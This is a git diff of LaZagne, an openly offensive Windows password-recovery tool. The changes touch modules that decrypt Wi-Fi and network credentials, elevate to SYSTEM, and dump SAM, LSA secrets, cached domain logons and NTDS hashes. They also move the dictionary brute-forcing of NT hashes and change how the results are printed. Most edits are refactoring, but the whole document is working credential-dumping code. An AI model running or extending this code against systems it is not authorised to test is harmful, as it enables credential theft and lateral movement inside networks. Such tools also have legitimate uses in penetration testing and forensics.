a/Windows/src/LaZagne/softwares/wifi/wifi.py b/Windows/src/LaZagne/softwares/wifi/wifi.py index 2d7c8147..4af7bc1e 100644 --- a/Windows/src/LaZagne/softwares/wifi/wifi.py +++ b/Windows/src/LaZagne/softwares/wifi/wifi.py @@ -15,10 +15,10 @@ def __init__(self): def run(self): # print title - Header().title_debug('Wifi') + Header().title_info('Wifi') if not windll.Shell32.IsUserAnAdmin(): - print_debug('ERROR', '[!] This script should be run as admin!') + print_debug('WARNING', '[!] This script should be run as admin!') return else: @@ -36,7 +36,8 @@ def run(self): print_debug('INFO', '[!] Trying to elevate our privilege') get_system_priv() print_debug('INFO', '[!] Elevation ok - Passwords decryption is in progress') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '[!] An error occurs during the privilege elevation process. Wifi passwords have not been decrypted') time.sleep(5) diff --git a/Windows/src/LaZagne/softwares/windows/dot_net.py b/Windows/src/LaZagne/softwares/windows/dot_net.py index 611ad350..a2ba1847 100644 --- a/Windows/src/LaZagne/softwares/windows/dot_net.py +++ b/Windows/src/LaZagne/softwares/windows/dot_net.py @@ -35,7 +35,8 @@ def get_creds(self): try: creds = win32cred.CredEnumerate(None, 0) return creds - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return None def get_entropy(self): @@ -59,7 +60,7 @@ def Win32CryptUnprotectData(self, cipherText, entropy): def run(self): # print title - Header().title_debug('Dot Net Passport') + Header().title_info('Dot Net Passport') a = self.get_creds() pwd = '' @@ -76,7 +77,8 @@ def run(self): values['Username'] = i['UserName'] try: values['Password'] = pwd.decode('utf16') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) values['INFO'] = 'Error decoding the password' pwdFound.append(values) diff --git a/Windows/src/LaZagne/softwares/windows/network.py b/Windows/src/LaZagne/softwares/windows/network.py index 5db390a6..f6eef4a1 100644 --- a/Windows/src/LaZagne/softwares/windows/network.py +++ b/Windows/src/LaZagne/softwares/windows/network.py @@ -34,7 +34,8 @@ def get_creds(self): try: creds = win32cred.CredEnumerate(None, 0) return creds - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return None def get_entropy(self): @@ -60,7 +61,7 @@ def Win32CryptUnprotectData(self, cipherText, entropy): def run(self): # print title - Header().title_debug('Generic Network') + Header().title_info('Generic Network') os_plateform = platform.release() @@ -91,7 +92,8 @@ def run(self): try: values['Password'] = pwd.decode('utf16') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) values['INFO'] = 'Error decoding the password' pwdFound.append(values) diff --git a/Windows/src/LaZagne/softwares/windows/secrets.py b/Windows/src/LaZagne/softwares/windows/secrets.py index 4f2391e5..5aa51e17 100644 --- a/Windows/src/LaZagne/softwares/windows/secrets.py +++ b/Windows/src/LaZagne/softwares/windows/secrets.py @@ -33,13 +33,13 @@ def delete_existing_systemFiles(self): def run(self): # Need admin privileges if not windll.Shell32.IsUserAnAdmin(): - if logging.getLogger().isEnabledFor(logging.DEBUG) == True: - Header().title_info('Windows Secrets') - print_debug('ERROR', '[!] This script should be run as admin!') + if logging.getLogger().isEnabledFor(logging.INFO) == True: + Header().title('Windows Secrets') + print_debug('WARNING', '[!] This script should be run as admin!') return # print the title - Header().title_info('Windows Secrets') + Header().title('Windows Secrets') # if hives already exists if self.check_existing_systemFiles(): diff --git a/Windows/src/LaZagne/softwares/windows/secretsdump.py b/Windows/src/LaZagne/softwares/windows/secretsdump.py index 09b357ad..7ab06a8c 100644 --- a/Windows/src/LaZagne/softwares/windows/secretsdump.py +++ b/Windows/src/LaZagne/softwares/windows/secretsdump.py @@ -48,11 +48,11 @@ from collections import OrderedDict import win32con, win32security, win32net import binascii -from softwares.browsers.dico import get_dico -from config.write_output import print_debug, checks_write -import WConio -import logging +from config.dico import get_dico +from config.write_output import print_debug, print_output +# import logging from config.constant import * +from config.header import Header import sys import random @@ -640,7 +640,7 @@ def __printSecret(self, name, secretItem): values['password'] = password else: # Default print, hexdump - values['hex'] = secretItem.encode('hex') + values['password in hex'] = secretItem.encode('hex') # hexdump(secretItem) self.__secretItems.append(values) @@ -988,6 +988,7 @@ def __init__(self, address, system=False, security=False, sam=False, ntds=False, self.__noLMHash = True self.__isRemote = False self.categoryName = '' + self.wordlist = get_dico() + constant.passwordFound def getBootKey(self): # Local Version whenever we are given the files directly @@ -1040,54 +1041,39 @@ def create_nthash(self, word): def bruteForce_Hash(self, hash): # check with a basic dictionary list and with all passwords already found - wordlist = get_dico() + constant.passwordFound - for word in wordlist: + for word in self.wordlist: generated_hash = self.create_nthash(word) if generated_hash == hash: return word return False - def print_hashes(self, category, content): - if category == 'title': - WConio.textcolor(WConio.WHITE) - logging.info('%s\n' % content) - WConio.textcolor(WConio.LIGHTGREY) - self.categoryName = content + def hashes_to_dic(self, title, format, content): + Header().title1(title) + print_debug('INFO', 'Format: (%s)' % format) - elif category == 'hashes': - accounts = [] - items = sorted(content) - toWrite = "############ %s passwords ############\r\n\r\n" % self.categoryName - for item in items: - hash = content[item] - toWrite += hash + '\r\n' - logging.info('%s' % hash) - (uid, rid, lmhash, nthash) = hash.split(':')[:4] - password = self.bruteForce_Hash(nthash) - if password: - accounts.append((uid, password)) - # if the bruteforce attacks worked - if accounts: - logging.info('\n') - print_debug("OK", "Password found !!!") - toWrite += '\r\n- Password in cleartext\r\n' - for account in accounts: - constant.nbPasswordFound += 1 - (user, password) = account - toWrite += '%s: %s\r\n' % (user, password) - logging.info('%s: %s' % (user, password)) - logging.info('\n') - toWrite += '\r\n' - open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(toWrite) + items = sorted(content) + pwdFound = [] + values = {} - elif category == 'secrets': - for secret in content: - print_debug("OK", "Password found !!!") - constant.nbPasswordFound += 1 - for s in secret.keys(): - logging.info('%s: %s' % (s, secret[s])) - logging.info('\n') - checks_write(content, self.categoryName) + all_hash = '\r\n' + for item in items: + hash = content[item] + (uid, rid, lmhash, nthash) = hash.split(':')[:4] + self.wordlist.append(uid.encode("utf8")) + all_hash = '%s\r\n%s' % (all_hash, hash) + password = self.bruteForce_Hash(nthash) + + # if a password has been found from the dictionary attack + if password: + accounts = {} + accounts['Category'] = 'System account' + accounts['user'] = uid + accounts['password'] = password + pwdFound.append(accounts) + + values['hashes'] = all_hash + pwdFound.append(values) + return pwdFound def dump(self): try: @@ -1101,8 +1087,8 @@ def dump(self): self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote) samHashes_tab = self.__SAMHashes.dump() if samHashes_tab: - self.print_hashes('title', '[*] Local SAM hashes (uid:rid:lmhash:nthash') - self.print_hashes('hashes', samHashes_tab) + pwdFound = self.hashes_to_dic('Local SAM hashes', 'uid:rid:lmhash:nthash', samHashes_tab) + print_output('Local SAM hashes', pwdFound, True) # -------------- LSA SECRETS -------------- SECURITYFileName = self.__securityHive @@ -1111,21 +1097,21 @@ def dump(self): # --- Cached Hashes --- cachedHashes = self.__LSASecrets.dumpCachedHashes() if cachedHashes: - self.print_hashes('title', '[*] Cached domain logon information (uid:encryptedHash:longDomain:domain)') - self.print_hashes('hashes', cachedHashes) + pwdFound = self.hashes_to_dic('Cached domain logon information', 'uid:encryptedHash:longDomain:domain', cachedHashes) + print_output('Cached domain logon information', pwdFound, True) # --- LSA Secrets --- secrets = self.__LSASecrets.dumpSecrets() if secrets: - self.print_hashes('title', '[*] LSA Secrets') - self.print_hashes('secrets', secrets) + Header().title1('LSA Secrets') + print_output('LSA Secrets', secrets, True) # -------------- NTDS File -------------- NTDSFileName = self.__ntdsFile self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote = self.__isRemote, history = self.__history, noLMHash = self.__noLMHash) ntdsHashes_dic = self.__NTDSHashes.dump() if ntdsHashes_dic: - self.print_hashes('title', '[*] NTDS File') + Header().title1('NTDS File') for nts_keys in ntdsHashes_dic.keys(): hashesFound = ntdsHashes_dic[nts_keys] if nts_keys == 'ntds': @@ -1133,8 +1119,8 @@ def dump(self): for item in items: try: hashesFound[item] - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) elif nts_keys == 'ntds.kerberos': for itemKey in hashesFound: print itemKey diff --git a/Windows/standalone/laZagne.exe b/Windows/standalone/laZagne.exe deleted file mode 100644 index d860feb1..00000000 Binary files a/Windows/standalone/laZagne.exe and /dev/null differ diff --git a/pictures/softwares.png b/pictures/softwares.png index 1421a71a..ae3bf1ed 100644 Binary files a/pictures/softwares.png and b/pictures/softwares.png differ